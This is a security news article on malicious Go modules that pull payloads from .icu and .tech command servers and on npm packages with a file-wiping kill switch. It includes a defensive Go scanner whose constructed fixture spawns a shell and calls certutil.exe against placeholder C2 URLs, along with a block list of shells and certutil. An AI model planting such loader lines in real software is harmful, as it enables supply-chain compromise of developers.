- Researchers found 11 new malicious Go packages delivering remote payloads on Windows and Linux.
- These packages contain hidden loaders that can download additional malware from several command-and-control (C2) servers.
- The decentralized Go module system makes it easier for attackers to trick developers into using harmful code.
- Two npm packages disguised as WhatsApp socket libraries have a kill switch that can wipe developers’ files if certain conditions are met.
- The threat highlights continued risks in open-source software supply chains, with attackers exploiting trusted channels to spread malware.
Cybersecurity researchers identified 11 Go programming language packages distributing malicious code that targets both Windows and Linux devices. The discovery took place in early August 2025, when security teams observed these packages attempting to download and execute harmful payloads from remote servers.
According to Socket security researcher Olivia Brown, “At runtime the code silently spawns a shell, pulls a second-stage payload from an interchangeable set of .icu and .tech command-and-control (C2) endpoints, and executes it in memory,” as detailed in a recent report. The affected packages, including those named linker, stm, opt, and others, are available via GitHub repositories and are designed to deceive developers with credible names.
The packages contain code designed to hide a loader, which then fetches additional programs in ELF (for Linux) or PE (for Windows) formats. These second-stage payloads gather device details, access web browser information, and contact their control servers. “Because the second-stage payload delivers a bash-scripted payload for Linux systems and retrieves Windows executables via certutil.exe, both Linux build servers and Windows workstations are susceptible to compromise,” Brown said.
Socket noted that the broad and decentralized Go module system contributes to the risk. Developers can directly import modules from any GitHub repository, and attackers create malicious packages using names that seem trustworthy. This strategy increases the risk that unsuspecting developers will use packages containing malware.
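Because any GitHub repository can be imported as a Go module, a team's only reliable control is to review what a dependency does before it is built. The following scanner is an added example written for this article; it is not code from Socket or from any of the packages named above. It uses Go's own `go/ast` parser to flag the two behaviours the report describes: string literals pointing at `.icu` or `.tech` hosts, and `exec.Command` calls that launch a shell or `certutil.exe`. The `SampleLoader` fixture is constructed for the demonstration and only mimics the shape of such a loader; the hostnames in it are placeholders, not indicators from the report.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strconv"
	"strings"
)

// Finding is one suspicious construct located in a scanned Go source file.
type Finding struct {
	Line   int
	Reason string
}

// suspiciousTLDs are the C2 top-level domains named in the Socket report.
var suspiciousTLDs = []string{".icu", ".tech"}

// suspiciousBinaries are programs a library has no business spawning at
// import time; "sh" and "certutil.exe" are the two the report describes.
var suspiciousBinaries = map[string]bool{
	"sh": true, "bash": true, "cmd.exe": true, "powershell.exe": true,
	"certutil": true, "certutil.exe": true,
}

// hasURLWithSuspiciousTLD reports whether s is an http(s) URL whose host
// ends in one of suspiciousTLDs (port, path and query are stripped first).
func hasURLWithSuspiciousTLD(s string) bool {
	ls := strings.ToLower(s)
	if !strings.HasPrefix(ls, "http://") && !strings.HasPrefix(ls, "https://") {
		return false
	}
	host := ls[strings.Index(ls, "://")+3:]
	if i := strings.IndexAny(host, "/:?#"); i >= 0 {
		host = host[:i]
	}
	for _, tld := range suspiciousTLDs {
		if strings.HasSuffix(host, tld) {
			return true
		}
	}
	return false
}

// ScanSource parses one Go file and returns findings for C2-style URLs and
// for exec.Command / exec.CommandContext calls whose program is a shell or
// certutil. Limitation: os/exec is only recognised under its default name.
func ScanSource(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	file, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var findings []Finding
	ast.Inspect(file, func(n ast.Node) bool {
		switch x := n.(type) {
		case *ast.BasicLit:
			if x.Kind != token.STRING {
				return true
			}
			if s, err := strconv.Unquote(x.Value); err == nil && hasURLWithSuspiciousTLD(s) {
				findings = append(findings, Finding{fset.Position(x.Pos()).Line, "URL on C2-style TLD: " + s})
			}
		case *ast.CallExpr:
			sel, ok := x.Fun.(*ast.SelectorExpr)
			if !ok {
				return true
			}
			pkg, ok := sel.X.(*ast.Ident)
			if !ok || pkg.Name != "exec" {
				return true
			}
			argIdx := map[string]int{"Command": 0, "CommandContext": 1} // index of program name
			idx, known := argIdx[sel.Sel.Name]
			if !known || len(x.Args) <= idx {
				return true
			}
			if lit, ok := x.Args[idx].(*ast.BasicLit); ok && lit.Kind == token.STRING {
				name, _ := strconv.Unquote(lit.Value)
				base := strings.ToLower(name)
				if i := strings.LastIndexAny(base, `/\`); i >= 0 {
					base = base[i+1:] // compare on the bare program name
				}
				if suspiciousBinaries[base] {
					findings = append(findings, Finding{fset.Position(x.Pos()).Line, "spawns " + name})
				}
			}
		}
		return true
	})
	return findings, nil
}

// SampleLoader is a constructed fixture for this example; the hosts are
// placeholders and the file is not code from any real package.
const SampleLoader = `package stm

import "os/exec"

func init() {
	c2 := "https://example-c2.icu/stage2"
	_ = exec.Command("sh", "-c", "echo "+c2).Run()
	_ = exec.Command("certutil.exe", "http://example-c2.tech/x.exe").Run()
	_ = exec.Command("go", "version").Run()
}
`

func main() {
	findings, err := ScanSource("sample.go", SampleLoader)
	if err != nil {
		panic(err)
	}
	for _, f := range findings { // expected: four findings on lines 6, 7, 8, 8
		fmt.Printf("sample.go:%d: %s\n", f.Line, f.Reason)
	}
}
```

Run against the fixture it reports the `.icu` URL on line 6, the shell spawn on line 7, and both the `certutil.exe` spawn and the `.tech` URL on line 8, while the harmless `go version` call on line 9 is ignored. Pointing `ScanSource` at every file under a vendored module (or at the module cache before `go build`) gives a cheap pre-merge gate; it is deliberately narrow, so a clean result is a reason to keep reviewing, not a clean bill of health.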
The research team suspects a single threat actor created these 11 packages because of similarities in their code and shared C2 infrastructure. The incident underlines ongoing threats in open-source software distribution channels, as malware authors keep using these systems to reach a wider range of victims.
In addition, two npm packages, naya-flore and nvlore-hsc, were found to pose as WhatsApp socket libraries and contain a remote “kill switch.” If a tested phone number is not on an Indonesian phone number list retrieved from a GitHub repository, the packages run a script to erase all files on the system after WhatsApp pairing. As of now, these libraries remain available on npm and have over 1,100 downloads.
Security researcher Kush Pandya also revealed that “naya-flore also contains a hardcoded GitHub Personal Access Token that provides unauthorized access to private repositories.” This token’s purpose is unclear, and parts of the code meant for collecting device information are currently disabled, indicating possible further development.
Experts from Fortinet FortiGuard Labs explained that attackers rely on established methods, including script-based installation and data theft. They also warned that “A continued rise in obfuscation also further notes the importance of vigilance and ongoing monitoring required by users of these services.” As open-source software use grows, so does the risk in the software supply chain.